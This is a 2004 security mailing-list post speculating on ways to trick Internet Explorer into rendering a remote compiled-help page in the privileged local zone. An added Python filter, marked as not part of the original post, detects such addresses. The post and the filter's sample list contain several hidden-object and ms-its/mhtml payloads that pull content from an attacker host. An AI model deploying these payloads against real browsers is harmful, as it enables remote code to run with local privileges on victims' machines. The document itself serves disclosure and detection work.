Message-ID: <200406112100.i5BL0b6R003579@web119.megawebservers.com>
Date: Fri, 11 Jun 2004 21:00:37 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>
Cc: <NTBugtraq@...tserv.ntbugtraq.com>
Subject: COELACANTH: After Math




There is a sneaking suspicion that you can put the site contents 
in the so-called 'local zone' or 'my computer'.

Since it validates the 'front end' of the address and ends up at 
the 'back end' this all would seem very similar to:

<object data="ms-its:mhtml:file://C:foo.mhtml!http://www.malware.com//bad.chm::/foo.html" 
type="text/x-scriptlet" style="visibility:hidden">

where Internet Explorer gets 'confused' by the url 
mhtml:file://C:foo.mhtml! switches to the local zone as a 
result of C:, stays there and passes through to the 'back end' 
http://www.malware.com//bad.chm::/foo.html on the remote server 
while in the 'local zone' and renders foo.html in there.

If this peculiar DNS setup also has a 'proper' chm file on it 
the following should work [as it does on any server setup]:


<object data="ms-its:http://www.malware.com//bad.chm::/foo.html" 
type="text/x-scriptlet" style="visibility:hidden">


now as above if we include in the 'front end':

ms-its:C:\\WINDOWS\\Help\\iexplore.chm::/http://www.malware.com//bad.chm::/foo.html

It should see it as in C: and make its little 'zone' 
determination first, then pass through to the 'back end'

http://www.malware.com//bad.chm::/foo.html

and render foo.html in the 'local zone' even though it is on the 
remote server.

You'd have to tinker quite a bit:

ms-its:C:::/http://www.malware.com//bad.chm::/foo.html
ms-its:C:%2Fredir=/http://www.malware.com//bad.chm::/foo.html

etc.

Anyone have a server they care to set up?


-- 
http://www.malware.com
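
Added example, not part of the original post: a filter for mail or web content that flags the address shape discussed above, where a wrapping handler is followed by a local 'front end' and a remote 'back end'. The function names, labels and the two benign samples are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# ms-its: and mhtml: appear in the post; its: and mk:@MSITStore: are the
# other names for the same InfoTech storage handler.
WRAPPER = re.compile(r"^(?:ms-its:|its:|mk:@msitstore:|mhtml:)+")
LOCAL = re.compile(r"^(?:file:/*)?[a-z]:")   # drive letter, optional file://
REMOTE = re.compile(r"(?:https?|ftp)://")
ATTR = re.compile(r"""(?:data|src|href)\s*=\s*(["'])(.*?)\1""", re.I | re.S)


def classify(url):
    """Return a finding label for a wrapped address, or None."""
    # Undo line wrapping and %-encoding before looking at the structure.
    u = unquote(re.sub(r"\s+", "", url)).lower()
    m = WRAPPER.match(u)
    if not m:
        return None
    rest = u[m.end():]
    if LOCAL.match(rest) and REMOTE.search(rest):
        return "local-front-remote-back"   # zone decided on C:, content remote
    if REMOTE.match(rest):
        return "remote-compiled-help"      # handler pointed straight at a server
    return None


def scan_html(html):
    """Return (label, value) for every flagged data/src/href attribute."""
    return [(lab, v) for _, v in ATTR.findall(html) if (lab := classify(v))]


# Addresses quoted in the post, then two constructed benign ones (last two).
SAMPLES = [
    "ms-its:mhtml:file://C:foo.mhtml!http://www.malware.com//bad.chm::/foo.html",
    "ms-its:http://www.malware.com//bad.chm::/foo.html",
    r"ms-its:C:\\WINDOWS\\Help\\iexplore.chm::/http://www.malware.com//bad.chm::/foo.html",
    "ms-its:C:::/http://www.malware.com//bad.chm::/foo.html",
    "ms-its:C:%2Fredir=/http://www.malware.com//bad.chm::/foo.html",
    r"ms-its:C:\\WINDOWS\\Help\\iexplore.chm::/index.htm",
    "http://www.example.com/page.html",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(classify(s), s)
```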